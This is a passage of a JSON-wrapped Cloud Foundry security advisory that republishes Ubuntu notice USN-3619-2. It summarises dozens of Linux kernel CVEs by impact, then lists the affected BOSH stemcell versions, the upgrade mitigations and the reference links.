LTS for Ubuntu 14.04 LTS.\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel improperly performed sign extension in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM could use this to cause a denial of service (system crash) in the host OS. (CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in the ACPI implementation of the Linux kernel. A local attacker could use this to expose sensitive information (kernel memory addresses). (CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the network namespaces implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel contained a use-after-free when handling device removal. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux kernel did not properly validate endpoint metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture driver in the Linux kernel did not properly validate interface descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver in the Linux kernel did not properly validate device descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the Linux kernel did not properly handle detach events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not properly validate device descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly validate device descriptors. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) driver in the Linux kernel contained an information disclosure vulnerability. A physically proximate attacker could use this to expose sensitive information (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel did not validate endpoint numbers. A remote attacker could use this to cause a denial of service (system crash). (CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel did not properly validate CMD_SUBMIT packets. A remote attacker could use this to cause a denial of service (excessive memory consumption). (CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel contained a NULL pointer dereference error. A remote attacker could use this to cause a denial of service (system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not properly handle holes in hugetlb ranges. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not properly restrict access to the connection tracking helpers list. A local attacker could use this to bypass intended access restrictions. (CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not properly restrict observations of netlink messages to the appropriate net namespace. A local attacker could use this to expose sensitive information (kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) module did not properly perform access control checks. A local attacker could improperly modify the system-wide OS fingerprint list. (CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not validate the number of configurations and interfaces in a device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel contained an out-of-bounds read when handling memory-mapped I/O. A local attacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in the Linux kernel did not properly handle zero-length inputs. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state of the underlying cryptographic hash algorithm. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did not properly check permissions when a key request was performed on a task\u2019s default keyring. A local attacker could use this to add keys to unauthorized keyrings. (CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel contained a branch-pruning logic issue around unreachable code. A local attacker could use this to cause a denial of service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux kernel incorrectly freed kernel memory. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper component of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system implementation in the Linux kernel. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the the madvise(2) implementation in the Linux kernel in certain circumstances. A local attacker could use this to cause a denial of service (system hang). (CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel was vulnerable to a debug exception error when single-stepping through a syscall. A local attacker in a non-Linux guest vm could possibly use this to gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the Linux kernel did not properly validate Generic Segment Offload (GSO) packet sizes. An attacker could use this to cause a denial of service (interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in the Linux kernel contained an out-of-bounds write during RDMA page allocation. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable Datagram Sockets) protocol implementation of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS (Reliable Datagram Sockets) protocol implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in the Linux kernel did not properly validate device resources. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-8043)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.53\n * 3421.x versions prior to 3421.46\n * 3445.x versions prior to 3445.32\n * 3468.x versions prior to 3468.30\n * 3541.x versions prior to 3541.12\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3363.x versions to 3363.53\n * Upgrade 3421.x versions to 3421.46\n * Upgrade 3445.x versions to 3445.32\n * Upgrade 3468.x versions to 3468.30\n * Upgrade 3541.x versions to 3541.12\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3619-2](<https://usn.ubuntu.com/3619-2/>)\n * [CVE-2017-0861](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-0861>)\n * [CVE-2017-1000407](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000407>)\n * [CVE-2017-11472](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-11472>)\n * [CVE-2017-15129](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-15129>)\n * [CVE-2017-16528](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16528>)\n * [CVE-2017-16532](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16532>)\n * [CVE-2017-16536](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16536>)\n * [CVE-2017-16537](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16537>)\n * [CVE-2017-16645](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16645>)\n * [CVE-2017-16646](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16646>)\n * [CVE-2017-16649](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16649>)\n * [CVE-2017-16650](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16650>)\n * [CVE-2017-16911](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16911>)\n * [CVE-2017-16912](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16912>)\n * [CVE-2017-16913](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16913>)\n * [CVE-2017-16914](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16914>)\n * [CVE-2017-16994](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16994>)\n * [CVE-2017-16995](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16995>)\n * [CVE-2017-17448](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17448>)\n * [CVE-2017-17449](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17449>)\n * [CVE-2017-17450](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17450>)\n * [CVE-2017-17558](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17558>)\n * [CVE-2017-17741](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17741>)\n * [CVE-2017-17805](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17805>)\n * [CVE-2017-17806](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17806>)\n * [CVE-2017-17807](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17807>)\n * [CVE-2017-17862](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-17862>)\n * [CVE-2017-18075](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18075>)\n * [CVE-2017-18203](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18203>)\n * [CVE-2017-18204](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18204>)\n * [CVE-2017-18208](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-18208>)\n * [CVE-2017-7518](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-7518>)\n * [CVE-2018-1000026](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1000026>)\n * [CVE-2018-5332](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5332>)\n * [CVE-2018-5333](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5333>)\n * [CVE-2018-5344](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-5344>)\n * [CVE-2018-6927](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-6927>)\n * [CVE-2018-7492](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7492>)\n * [CVE-2018-8043](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-8043>)\n", "edition": 5, "modified": "2018-05-02T00:00:00", "published": "2018-05-02T00:00:00", "id": "CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC", "href": "https://www.cloudfoundry.org/blog/usn-3619-2/", "title": "USN-3619-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
